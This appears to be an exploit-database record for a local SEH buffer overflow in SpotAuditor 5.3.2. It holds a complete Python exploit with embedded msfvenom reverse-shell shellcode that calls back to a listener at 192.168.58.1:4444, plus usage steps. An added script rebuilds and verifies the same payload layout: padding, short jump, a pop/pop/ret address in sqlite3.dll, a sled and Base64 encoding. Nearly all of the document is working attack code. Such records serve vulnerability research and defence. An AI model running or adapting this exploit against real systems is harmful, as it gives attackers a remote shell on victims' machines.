Description
SpotAuditor 5.3.2 - Base64 Local Buffer Overflow (SEH)
Record metadata (Vulners exploitpack entry):
  id: EXPLOITPACK:C41F90BF75BA715F22EBAB4D945A6FBB
  reporter: Kirill Nikolaev
  type: exploitpack (local, Windows); bulletin family: exploit
  published: 2019-12-09; modified: 2019-12-09; edition: 1; last seen: 2020-04-01T20:40:42
  cvelist: none; cvss: 0.0 (vector NONE); vulnersScore: -0.0; viewCount: 3
  references: none

Exploit source (the record's sourceData field; the script is written for Python 3, so every payload piece is a bytes object):

```python
#!/usr/bin/env python3
# Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)
# Exploit Author: Kirill Nikolaev
# Date: 2019-12-06
# Vulnerable Software: SpotAuditor
# Vendor Homepage: http://www.nsauditor.com/
# Version: 5.3.2
# Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Tested on: Windows 7 SP1 x86

# PoC
# 1. Download and install SpotAuditor
# 2. Replace the shellcode in this script with your own
# 3. Generate the payload with this script
# 4. Run the software, open "Tools -> Base64 Encrypted Password" and feed it the generated Base64 string
# 5. Catch the reverse shell on your listener (LHOST/LPORT from the msfvenom command below)
# Original DoS exploit: https://www.exploit-db.com/exploits/47719

import base64

print("[+] Thank you for choosing our company")
print("[+] Local Buffer Overflow (SEH) in SpotAuditor 5.3.2")
print("[+] Created By Kirill Nikolaev")
print("[+] Generating payload; check that it carries your shellcode")
print("")

# 1024 bytes of padding up to the nSEH record
head = b'A' * 1024
# nSEH: two filler bytes, then "jmp short +0x0c" (eb 0c), which hops over the
# SEH address and most of the sled below, landing just in front of the shellcode
jmp_across = b'\x41\x41\xeb\x0c'
# SEH handler, packed little-endian:
# 0x61e0b194 : pop ebx # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.15.2 (C:\Program Files\Nsasoft\SpotAuditor\sqlite3.dll)
seh = b'\x94\xb1\xe0\x61'
# short sled ('A' = inc ecx) between the SEH address and the shellcode
header_for_shellcode = b'\x41' * 10
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.58.1 LPORT=4444 -f py EXITFUNC=thread -b '\x00'
buf = b""
buf += b"\xbd\x7a\xfe\x84\xdd\xdb\xc9\xd9\x74\x24\xf4\x58\x31"
buf += b"\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\x12\xf0\x66"
buf += b"\x28\x1e\xe4\xe5\xd3\xde\xf5\x89\x5a\x3b\xc4\x89\x39"
buf += b"\x48\x77\x3a\x49\x1c\x74\xb1\x1f\xb4\x0f\xb7\xb7\xbb"
buf += b"\xb8\x72\xee\xf2\x39\x2e\xd2\x95\xb9\x2d\x07\x75\x83"
buf += b"\xfd\x5a\x74\xc4\xe0\x97\x24\x9d\x6f\x05\xd8\xaa\x3a"
buf += b"\x96\x53\xe0\xab\x9e\x80\xb1\xca\x8f\x17\xc9\x94\x0f"
buf += b"\x96\x1e\xad\x19\x80\x43\x88\xd0\x3b\xb7\x66\xe3\xed"
buf += b"\x89\x87\x48\xd0\x25\x7a\x90\x15\x81\x65\xe7\x6f\xf1"
buf += b"\x18\xf0\xb4\x8b\xc6\x75\x2e\x2b\x8c\x2e\x8a\xcd\x41"
buf += b"\xa8\x59\xc1\x2e\xbe\x05\xc6\xb1\x13\x3e\xf2\x3a\x92"
buf += b"\x90\x72\x78\xb1\x34\xde\xda\xd8\x6d\xba\x8d\xe5\x6d"
buf += b"\x65\x71\x40\xe6\x88\x66\xf9\xa5\xc4\x4b\x30\x55\x15"
buf += b"\xc4\x43\x26\x27\x4b\xf8\xa0\x0b\x04\x26\x37\x6b\x3f"
buf += b"\x9e\xa7\x92\xc0\xdf\xee\x50\x94\x8f\x98\x71\x95\x5b"
buf += b"\x58\x7d\x40\xcb\x08\xd1\x3b\xac\xf8\x91\xeb\x44\x12"
buf += b"\x1e\xd3\x75\x1d\xf4\x7c\x1f\xe4\x9f\x42\x48\xdc\x5e"
buf += b"\x2b\x8b\x20\x70\xf7\x02\xc6\x18\x17\x43\x51\xb5\x8e"
buf += b"\xce\x29\x24\x4e\xc5\x54\x66\xc4\xea\xa9\x29\x2d\x86"
buf += b"\xb9\xde\xdd\xdd\xe3\x49\xe1\xcb\x8b\x16\x70\x90\x4b"
buf += b"\x50\x69\x0f\x1c\x35\x5f\x46\xc8\xab\xc6\xf0\xee\x31"
buf += b"\x9e\x3b\xaa\xed\x63\xc5\x33\x63\xdf\xe1\x23\xbd\xe0"
buf += b"\xad\x17\x11\xb7\x7b\xc1\xd7\x61\xca\xbb\x81\xde\x84"
buf += b"\x2b\x57\x2d\x17\x2d\x58\x78\xe1\xd1\xe9\xd5\xb4\xee"
buf += b"\xc6\xb1\x30\x97\x3a\x22\xbe\x42\xff\x42\x5d\x46\x0a"
buf += b"\xeb\xf8\x03\xb7\x76\xfb\xfe\xf4\x8e\x78\x0a\x85\x74"
buf += b"\x60\x7f\x80\x31\x26\x6c\xf8\x2a\xc3\x92\xaf\x4b\xc6"
# Trailing filler up to the 5000-byte length used by the original DoS PoC;
# computed but, as in the original script, not appended to the payload
tail = b'B' * (5000 - 1028 - 4 - 10 - len(buf))
shellcode = head + jmp_across + seh + header_for_shellcode + buf
print(base64.b64encode(shellcode).decode('ascii'))
```

--
Best regards,
Kirill Nikolaev
Penetration Tester
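The exploit hardcodes its layout: 1024 bytes of padding, an nSEH record of two filler bytes plus `jmp short 0x0c`, the pop/pop/ret address from sqlite3.dll, a 10-byte sled, then the shellcode, all Base64-encoded. The following is an added example, not Kirill Nikolaev's script or any SpotAuditor code: it derives the short-jump displacement from the sled length instead of typing it in, packs the handler address little-endian, rejects the null byte that msfvenom was told to avoid, and decodes the Base64 text back to confirm where the SEH pointer sits and where the jump lands. The stand-in shellcode is a constructed run of `inc ecx` bytes, not the reverse shell from the page, and the function names are this example's own.

```python
import base64
import struct

# Layout values taken from the published PoC
NSEH_OFFSET = 1024       # 'A' padding before the nSEH record
PPR_ADDR = 0x61E0B194    # pop ebx # pop ebp # ret in sqlite3.dll (no SafeSEH, no ASLR)
SLED_LEN = 10            # 'A' (inc ecx) bytes between the SEH pointer and the shellcode
BAD_CHARS = b"\x00"      # msfvenom was run with -b '\x00'

# Constructed stand-in for the msfvenom payload: 32 harmless 'inc ecx' bytes,
# enough to exercise the layout checks. Not the reverse shell from the page.
SAMPLE_SHELLCODE = b"\x41" * 32


def short_jmp(skip):
    """Encode 'jmp short' that skips `skip` bytes after the instruction (eb XX)."""
    if not 0 <= skip <= 0x7F:
        raise ValueError("forward short jump displacement must be 0..0x7f")
    return b"\xeb" + bytes([skip])


def find_bad_chars(data, bad=BAD_CHARS):
    """Return the sorted list of bad-character values that occur in data."""
    return sorted({c for c in data if c in bad})


def build_seh_payload(shellcode, nseh_offset=NSEH_OFFSET, ppr=PPR_ADDR, sled_len=SLED_LEN):
    """Assemble padding | nSEH | SEH | sled | shellcode and reject bad characters.

    After pop/pop/ret the CPU executes the 4 nSEH bytes: two filler bytes, then
    'jmp short'. Its displacement is counted from the byte after the jump, which
    is the SEH pointer itself, so landing on the last two sled bytes means
    skipping the 4-byte handler address plus sled_len - 2 bytes: 4 + 8 = 0x0c
    in the PoC.
    """
    skip = 4 + (sled_len - 2)
    nseh = b"\x41\x41" + short_jmp(skip)
    seh = struct.pack("<I", ppr)            # little-endian: 94 b1 e0 61
    sled = b"\x41" * sled_len
    controlled = nseh + seh + sled + shellcode
    bad = find_bad_chars(controlled)
    if bad:
        raise ValueError("bad characters in payload: %s" % ", ".join(hex(c) for c in bad))
    return b"A" * nseh_offset + controlled


def encode_payload(payload):
    """Base64 text to feed to the Base64 Encrypted Password dialog."""
    return base64.b64encode(payload).decode("ascii")


def check_layout(b64_text, nseh_offset=NSEH_OFFSET, ppr=PPR_ADDR):
    """Decode the text the target will receive and locate the SEH chain.

    Returns (seh_offset, landing_offset): where the handler pointer sits and
    where the nSEH jump transfers control. Raises if the chain is not intact.
    """
    raw = base64.b64decode(b64_text)
    nseh = raw[nseh_offset:nseh_offset + 4]
    seh = raw[nseh_offset + 4:nseh_offset + 8]
    if seh != struct.pack("<I", ppr):
        raise ValueError("SEH pointer not found at offset %d" % (nseh_offset + 4))
    if len(nseh) < 4 or nseh[2] != 0xEB:
        raise ValueError("nSEH does not contain a short jump")
    landing = nseh_offset + 4 + nseh[3]     # displacement is relative to the SEH pointer
    return nseh_offset + 4, landing


if __name__ == "__main__":
    payload = build_seh_payload(SAMPLE_SHELLCODE)
    text = encode_payload(payload)
    seh_at, lands_at = check_layout(text)
    print("payload %d bytes, SEH at %d, jump lands at %d, shellcode at %d"
          % (len(payload), seh_at, lands_at, NSEH_OFFSET + 8 + SLED_LEN))
    print(text)
```

With the PoC values the jump lands at offset 1040, two bytes before the shellcode at 1042, which is why the page's `\xeb\x0c` works; change `SLED_LEN` and the displacement follows, while a sled longer than 0x7f - 2 bytes is refused because a short jump cannot reach it.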